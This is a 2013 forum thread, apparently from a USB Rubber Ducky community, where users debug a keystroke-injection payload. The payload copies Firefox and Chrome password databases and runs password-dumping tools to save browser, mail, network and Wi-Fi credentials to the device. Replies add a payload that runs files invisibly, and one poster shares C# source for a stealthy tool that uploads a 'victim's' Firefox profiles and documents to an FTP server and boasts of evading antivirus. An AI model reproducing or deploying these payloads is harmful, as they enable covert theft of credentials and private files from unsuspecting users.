h4x0r666 Posted February 28, 2013 Share Posted February 28, 2013 (edited) What is wrong with this? I just got my rubber ducky but its not doing what i want.. it just opens some random things and type the rest of the code there.. i made the inject.bin with http://www.iducke.com/Encoder/ because i have no linux beside me at the moment-.-" this is the payload: REM ###################################################################################################### REM # Author: H4x0r666 # REM # OS Designed and Tested on: Windows Vista Home Basic # REM # # REM # This script was developed and intended to: # REM # # REM # 1.) Copy the Firefox key3.db & signons.sqlite (as passwords backup) # REM # 2.) Copy the Google Chrome Login Data (as passwords backup) # REM # 3.) Starts iepv.exe to copy the Internet Explorer passwords # REM # 4.) Starts OperaPassView.exe to copy the Opera passwords # REM # 5.) Starts mailpv.exe to copy the mail passwords # REM # 6.) Starts BulletsPassView.exe to copy the passwords behind bullets (the hidden passwords..) # REM # 7.) Starts netpass.exe to copy the net passwords # REM # 8.) Starts WirelessKeyView.exe to copy the wireless keys # REM # # REM # All through cmd commands.. # REM ###################################################################################################### DELAY 500 GUI d DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 400 CTRL-SHIFT ENTER DELAY 400 LEFT ENTER DELAY 750 ALT SPACE STRING m DOWNARROW REPEAT 100 ENTER DELAY 25 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d DELAY 100 STRING cd %AppData%\Mozilla\Firefox\Profiles ENTER STRING cd SPACE TAB ENTER STRING COPY key3.db %homepath%\Contacts ENTER STRING COPY signons.sqlite %homepath%\Contacts ENTER STRING MOVE /Y %homepath%\Contacts\key3.db %myd% ENTER STRING MOVE /Y %homepath%\Contacts\signons.sqlite %myd% ENTER DELAY 100 STRING cd %LocalAppData%\Google\Chrome\User Data\Default ENTER STRING COPY "Login Data" SPACE STRING %homepath%\Contacts ENTER STRING MOVE /Y "%homepath%\Contacts\Login Data" SPACE STRING %myd% ENTER DELAY 200 STRING %myd%\Programs\iepv.exe ENTER DELAY 2000 CTRL a DELAY 200 CTRL s DELAY 200 STRING ie_passwords.txt ENTER DELAY 2000 ALT F4 DELAY 200 STRING %myd%\Programs\OperaPassView.exe ENTER DELAY 2000 CTRL a DELAY 200 CTRL s DELAY 200 STRING opera_passwords.txt ENTER DELAY 2000 ALT F4 DELAY 200 STRING %myd%\Programs\mailpv.exe ENTER DELAY 2000 CTRL a DELAY 200 CTRL s DELAY 200 STRING mail_passwords.txt ENTER DELAY 2000 ALT F4 DELAY 200 STRING %myd%\Programs\BulletsPassView.exe ENTER DELAY 2000 CTRL a DELAY 200 CTRL s DELAY 200 STRING bb_passwords.txt ENTER DELAY 2000 ALT F4 DELAY 200 STRING %myd%\Programs\netpass.exe ENTER DELAY 2000 CTRL a DELAY 200 CTRL s DELAY 200 STRING net_passwords.txt ENTER DELAY 2000 ALT F4 DELAY 200 STRING %myd%\Programs\WirelessKeyView.exe ENTER DELAY 2000 CTRL a DELAY 200 CTRL s DELAY 200 STRING wireless_keys.txt ENTER DELAY 2000 ALT F4 DELAY 200 STRING exit ENTER EDITED AGAIN..... Please see my last post^^ Edited February 28, 2013 by h4x0r666 added spoiler tag Quote Link to comment Share on other sites More sharing options...
sober Posted February 28, 2013 Share Posted February 28, 2013 try a 5000 ms delay at beginning as well as STRING COPY key3.db %homepath%\Contacts needs a file name specified on copys for starters Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted February 28, 2013 Author Share Posted February 28, 2013 I need it to start cmd as administrator.. and i have a question also^^ What happens if an AV detects a malicious file? because the last program somehow got a false warning detected but i ignored it with my AV so i don't know what would happen if everything worked but it still got detected? I am not going to crypt it :P to much work^^ But i can't make the inject.bin if i use CTRL-SHIFT ESC :( it gives me an error so i have to find another way to open cmd as admin.. (changed first line because it doesn't need to start with GUI r but just with GUI i guess? (the start menu..) same as CTRL-SHIFT ESC? please someone help fixing it.. Quote Link to comment Share on other sites More sharing options...
no42 Posted February 28, 2013 Share Posted February 28, 2013 (edited) I thought: CTRL-SHIFT ESC -Start task manager CTRL-SHIFT ENTER - Run as Admin Also for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d only needs to be done once, then you can use the following below (less to type): %myd%/whatever.exe Edited February 28, 2013 by midnitesnake Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted February 28, 2013 Author Share Posted February 28, 2013 (edited) Yeah i ment CONTROL ESCAPE instead of CTRL+SHIFT+ESC.. but the the http://www.iducke.com/Encoder/ gives the following error.. CTRL-SHIFT ENTER is an unrecognized command EDIT: This works though.. GUI R STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER But i need it to start as admin and thats not the case with that code because when i start cmd through CONTROL ESCAPE > CMD > CTRL-SHIFT ENTER (manually) it can start any program directly as admin without asking again but with the above code it may look like it started as admin but its not because if you try to start a program it will still ask to accept or cancel.. Edited February 28, 2013 by h4x0r666 Quote Link to comment Share on other sites More sharing options...
no42 Posted February 28, 2013 Share Posted February 28, 2013 http://www.iducke.com/Encoder/ Uses Encoder v1. Things like CTRL-SHIFT X, where introduced in Encoder v2+. I suggest you download the updated Encoder from ducky-decode, and use that instead of the now outdated-IDE. Quote Link to comment Share on other sites More sharing options...
overwraith Posted February 28, 2013 Share Posted February 28, 2013 CTRL-SHIFT ENTER replace with: CTRL SHIFT ENTER Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted February 28, 2013 Author Share Posted February 28, 2013 I edited the whole payload again.. i am trying all kinds of stuff but it just doesn't do what i want it to do, please someone help me^^ I used the encoder 2.3 so yes it made the inject.bin succesfully but there must be something with the script.. STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d That above line only works when i have the sdcard in my reader but not in the ducky (and yes its called h4x0r666) but that can't be the problem. and is there something with the repeat 100 because its not going down.. someone please try and test it and if possible give me the inject.bin & modified payload. Manually almost everything does as i want.. but the ducky doesnt^^ Quote Link to comment Share on other sites More sharing options...
overwraith Posted February 28, 2013 Share Posted February 28, 2013 (edited) Unfortunately it takes time to mount the SD card before the executables on it can be accessed. The script probably tried accessing them before the drive had been mounted. Take a look at the payload "Run EXE from SD" on the wiki. Posting here also. The payload waits for the SD to mount. REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. DELAY 4000 REM Using the run command for a broader OS base. GUI R STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER DELAY 25 REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists DELAY 25 STRING erase /Q DuckyWait.bat DELAY 25 ENTER DELAY 25 STRING copy con DuckyWait.bat DELAY 25 ENTER DELAY 25 REM DuckyWait.bat DELAY 25 STRING :while1 DELAY 25 ENTER DELAY 25 STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d DELAY 25 ENTER DELAY 25 STRING if Exist %myd% ( DELAY 25 ENTER DELAY 25 STRING goto break DELAY 25 ENTER DELAY 25 STRING ) DELAY 25 ENTER DELAY 25 STRING timeout /t 30 DELAY 25 ENTER DELAY 25 STRING goto while1 DELAY 25 ENTER DELAY 25 STRING :break DELAY 25 ENTER DELAY 25 REM Continue script. DELAY 25 STRING %myd%\myEXE.bat DELAY 25 ENTER DELAY 25 CONTROL z DELAY 25 ENTER DELAY 25 REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. DELAY 25 REM Delete vbs file if already exists DELAY 25 STRING erase /Q invis.vbs DELAY 25 ENTER DELAY 25 REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up DELAY 25 STRING copy con invis.vbs DELAY 25 ENTER DELAY 25 STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False DELAY 25 ENTER DELAY 25 CONTROL Z DELAY 25 ENTER DELAY 25 REM RUN THE BATCH FILE DELAY 25 STRING wscript.exe invis.vbs DuckyWait.bat DELAY 25 ENTER DELAY 25 STRING EXIT ENTER I seem to remember that one of the firmware versions had a feature where pressing the button would replay the script. This would be another solution to the problem. Yet another solution would be to make the ducky execute when using one of the keyboard modifiers like num lock or scroll lock. Edited February 28, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted February 28, 2013 Share Posted February 28, 2013 You probably should also remove the ALT + F4 from the script also, because the command prompt doesn't close when you use ALT + F4. Quote Link to comment Share on other sites More sharing options...
Dnucna Posted February 28, 2013 Share Posted February 28, 2013 Hmm, I'm not sure to have programmed the ^ character because in french it's a dead key (^ then space) so I haven't tested this case. Have you an error or warning message during the encoding ? Dnu Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted February 28, 2013 Author Share Posted February 28, 2013 Np encoding goes smoothly and the ALT F4 is to close the extra windows from iepv.exe, operapassview.exe, mailpv.exe .. etc and yes i have looked over that script but how long does it needs to take to see my sdcard? it sees my ducky directly.. so since he also executes the inject.bin (from the sdcard) why doesn't he see the sdcard with the command? and why isnt the (hide window) working? i used the snippets from the official payloads... .. Quote Link to comment Share on other sites More sharing options...
overwraith Posted February 28, 2013 Share Posted February 28, 2013 I am not entirely sure why the down arrows are not working. The hide window script worked fine a month or so ago. I am thinking something either in the encoder or on the system changed. It is not even working on my computer now. Whatever is going on I am very cross. Quote Link to comment Share on other sites More sharing options...
overwraith Posted February 28, 2013 Share Posted February 28, 2013 Could the firmware upgrade be causing the down arrow and repeat commands not to work? Quote Link to comment Share on other sites More sharing options...
overwraith Posted February 28, 2013 Share Posted February 28, 2013 I got a quick fix. Replace the REPEAT 100 with 100 DOWNARROWs. For some reason the Repeat command doesn't work correctly. Quote Link to comment Share on other sites More sharing options...
ApacheTech Consultancy Posted February 28, 2013 Share Posted February 28, 2013 I've done this an easier way, I think. I've made a small, stealthy C#.NET file which uploads files to my FTP server. It's programmed with lots of try...catch blocks that simply gracefully degrade the program if it comes across any errors at all. I call it Firefox Extinguisher. There's currently four flavours of the program: FFE: Mission Critical - Uploads key3.db, signons.sqlite and cert8.db of all profiles (scans profiles.ini for non-standard installations). FFE: Sidejacker - The same as above, but includes cookies.sqlite, places.sqlite and any bookmark backups. FFE: Clone Wars - Uploads the entirety of any Firefox profile path found. FFE: DEFCON1 - Uploads all Firefox profiles, My Pictures, My Documents and acts as a daemon watching for changes in any Sidejacker files, reuploads any updated files and persists through reboot. The memory footprint is only about 120KB on idle. All versions come with LockSafing, allowing files to be uploaded, even if they are currently in use (i.e. if Firefox is open and in use). I know it's slightly on a tangent to the thread, but if yo do have any background in programming, or fancy playing around with .NET, it's a relatively simple app to write and a lot easier to run with the duck, using the wget and execute script. Quote Link to comment Share on other sites More sharing options...
no42 Posted February 28, 2013 Share Posted February 28, 2013 Repeat command is not supported in the duck encoder.jar (only the ide which is v1 and now outdated). Down arrow, is based off the basic hid mapping keyboard.properties, or corrected by your individual country-code.properties file; if this is incorrect please inform us of the patch? The firmware just echos commands from the encoder, you could try "DOWN" rather than "DOWNARROW" Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted March 1, 2013 Author Share Posted March 1, 2013 (edited) I don't think it does the down key at all look at this screenshot i just made.. (just before it quitted) Yess.. Sorry if you don't understand everything, i'm dutch but you can guess the output.. And yes ApacheTech Consultancy, i'm interested if you could show us some example payload with your nice file :D and.. for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d i just waited and tried it some more while the ducky did his thing (screenshot..) but it can't find the sdcard.. i wonder how it executes the inject.bin if the sd directory isnt detected o.0 well its my first day of using my ducky but anyway.. feels bad that it failed Edited March 1, 2013 by h4x0r666 Quote Link to comment Share on other sites More sharing options...
ApacheTech Consultancy Posted March 1, 2013 Share Posted March 1, 2013 The FTP Wrapper class I'm using is here: http://netftp.codeplex.com/releases/view/95632 The main bulk of the program is written using Extension Methods. These are the main ones. Please excuse the lack of annotation. using System; using System.IO; using System.Windows.Forms; using Ftp = System.Net.FtpClient; namespace ffe { public static class ExtensionsMethods { public static Ftp.FtpClient ftp = new Ftp.FtpClient() { Host = "REDACTED", Credentials = new System.Net.NetworkCredential("REDACTED", "REDACTED"), DataConnectionType = Ftp.FtpDataConnectionType.PASVEX, }; public static string baseDir = String.Format(@"{0}/{1}", Environment.MachineName, Environment.UserName); public static string ToFtpPath(this String s, string basePath, string section) { return String.Format(@"{0}/{1}/{2}", baseDir, section, s.Substring(basePath.Length).Replace(@"\", @"/")); } public static bool ExistsOnServer(this FileInfo f, string section, string basePath) { try { ftp.Connect(); if (ftp.FileExists(f.FullName.ToFtpPath(basePath, section))) { return true; } else { return false; } } catch (Exception) { Application.Exit(); return false; } finally { ftp.Disconnect(); } } public static void Upload(this FileInfo f, string section, string basePath) { FileInfo ls; { try { ls = f.LockSafe(); } catch (Exception) { return; } } if (ls.Length == 0) return; byte[] b = File.ReadAllBytes(ls.FullName); string rPath = f.FullName.ToFtpPath(basePath, section); string rDir = rPath.Substring(0, rPath.LastIndexOf("/")); try { ftp.SetDataType(Ftp.FtpDataType.Binary); { try { ftp.Connect(); } catch (Exception) { return; } } if (!ftp.DirectoryExists(rDir)) { ftp.CreateDirectory(rDir); } using (Stream o = ftp.OpenWrite(f.FullName.ToFtpPath(basePath, section))) { Console.Write(f.FullName.ToFtpPath(basePath, section) + " ..... "); try { while (o.Position <= b.Length) { o.Write(b, 0, b.Length); } Console.WriteLine("[ OK ]"); } catch (Exception ex) { Console.WriteLine("[ FAILED ]"); Console.WriteLine("Error:" + ex.Message); } } } catch (Exception ex) { Console.WriteLine("Error:" + ex.Message); } finally { f.CleanLockSafe(); ftp.Disconnect(); } } public static FileInfo LockSafe(this FileInfo file) { // Create a file stream. FileStream stream = null; try { // Try to open the file. stream = file.Open(FileMode.Open, FileAccess.ReadWrite, FileShare.None); } catch (IOException) { // The file is unavailable because it is: // Still being written to or is being processed by another thread. file.CleanLockSafe(); File.Copy(file.FullName, file.FullName + ".ffe"); return new FileInfo(file.FullName + ".ffe"); } finally { if (stream != null) stream.Close(); } // File is not locked return file; } public static void CleanLockSafe(this FileInfo f) { if (File.Exists(f.FullName + ".ffe")) { File.Delete(f.FullName + ".ffe"); } } } } Then, just a very simple controller class for the victim. using System; using System.Collections.Generic; using System.Linq; using System.IO; using System.Net; namespace ffe { public static class Victim { public static bool IsOnline { get { try { using (var client = new WebClient()) using (var stream = client.OpenRead("http://www.google.com")) { return true; } } catch { return false; } } } public static string Documents { get { return Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\"; } } public static string Pictures { get { return Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\"; } } public static string AppData { get { return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\"; } } public static string FirefoxProfiles { get { return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\"; } } public static string ProgramFiles { get { return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + @"\"; } } public static string Downloads { get { return Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + @"\Downloads"; } } } } And finally, the file lists themselves: using System.Collections.Generic; using System.IO; using System.Linq; namespace ffe { public static class FFE { public static List<FileInfo> MissionCriticalFileList { get { // Gather a list of files. List<FileInfo> tmpList = new List<FileInfo>(); string[] dirs = Directory.GetDirectories( Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly); foreach (string dir in dirs) { if (!dir.EndsWith("history")) { Directory.EnumerateFiles (Victim.FirefoxProfiles, "*", SearchOption.AllDirectories).Where((p) => p.EndsWith("signons.sqlite") || p.EndsWith("key3.db") || p.EndsWith("cert8.db")) .ToList<string>() .ForEach((p) => tmpList.Add(new FileInfo(p))); } } return tmpList; } } public static List<FileInfo> FullProfilesList { get { // Gather a list of files. List<FileInfo> tmpList = new List<FileInfo>(); string[] dirs = Directory.GetDirectories( Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly); foreach (string dir in dirs) { Directory.EnumerateFiles (Victim.FirefoxProfiles, "*", SearchOption.AllDirectories).Where((p) => (!p.Contains("minidumps"))) .ToList<string>() .ForEach((p) => tmpList.Add(new FileInfo(p))); } return tmpList; } } public static List<FileInfo> Documents { get { List<FileInfo> tmpList = new List<FileInfo>(); // Gather a list of the topmost directories. string[] dirs = Directory.GetDirectories(Victim.Documents, "*", SearchOption.TopDirectoryOnly); // Cycle through each top layer directory. foreach (string dir in dirs) { // If the folder is write-protected, skip it. if (!dir.EndsWith("My Music") & !dir.EndsWith("My Pictures") & !dir.EndsWith("My Videos")) { // Add all files in all readable subdirectories to a list. Directory.GetFiles(dir, "*.*", SearchOption.AllDirectories) .ToList<string>() .ForEach((p) => tmpList.Add(new FileInfo(p))); } } return tmpList; } } } } Once you have all that, it's relatively self explanatory what goes where. FFE.FullProfilesList.ForEach((p) => p.Upload("Firefox", Victim.FirefoxProfiles)); It's fully undetected on all of the online av scraper sites I've tried. Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted March 1, 2013 Author Share Posted March 1, 2013 Nice haha but anyway i got the DOWN thing working.. by replacing: ALT SPACE STRING m DOWNARROW REPEAT 100 ENTER With: ALT SPACE DOWNARROW ENTER DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER (But then 100 times the DOWNARROW because i guess... .. the repeat function isnt even working?) But do i need something extra to be able to run files from the SDcard while being mounted by the ducky? o.0 please explain :D Quote Link to comment Share on other sites More sharing options...
no42 Posted March 1, 2013 Share Posted March 1, 2013 But do i need something extra to be able to run files from the SDcard while being mounted by the ducky? o.0 please explain :D You need TwinDuck Firmware. What firmware are you running at the moment? Quote Link to comment Share on other sites More sharing options...
no42 Posted March 1, 2013 Share Posted March 1, 2013 Just implemented the REPEAT command in Encoder v2.4. If you could please participate in testing, and post feedback here. Thanks Snake Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted March 1, 2013 Author Share Posted March 1, 2013 The encoding process in 2.3 is done in less then a second while in 2.4 it or takes very very long.. or it just doesn't work but i quitted after waiting a couple minutes is it working for you correctly just like in 2.3 ? (I have Windows Home Basic, if the OS is the problem which wasnt on 2.3) and i have no idea what firmware i have at the moment.. since i just got my ducky i guess the default firmware it should have? What is the difference in TwinDuck Firmware? what do you recommend me.. ^_^ Quote Link to comment Share on other sites More sharing options...
ApacheTech Consultancy Posted March 1, 2013 Share Posted March 1, 2013 The TwinDuck firmware allows you to use the Duck as a Mass Storage Device, as well as a HID. There is a step by step guide to flashing your duck with the new firmware in the Stickies on the forum. Which duck are you using currently, i.e. what colour is the board? This will give us an indication of which stock firmware you are currently using. It is possible that commands which have either been added or depreciated are causing errors with your compiler. If you use the TwinDuck Firmware, make sure you use the latest versions of the compiler and make sure your Java files are up to date (or at least Java 1.7.0). This will give you the best chance of completion. Quote Link to comment Share on other sites More sharing options...
h4x0r666 Posted March 2, 2013 Author Share Posted March 2, 2013 i got the latest (green) board, i hope i don't fuck my ducky up xD would be awesome if someone could help tomorrow through teamviewer or something.. (for less chance of failing) >.<" Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.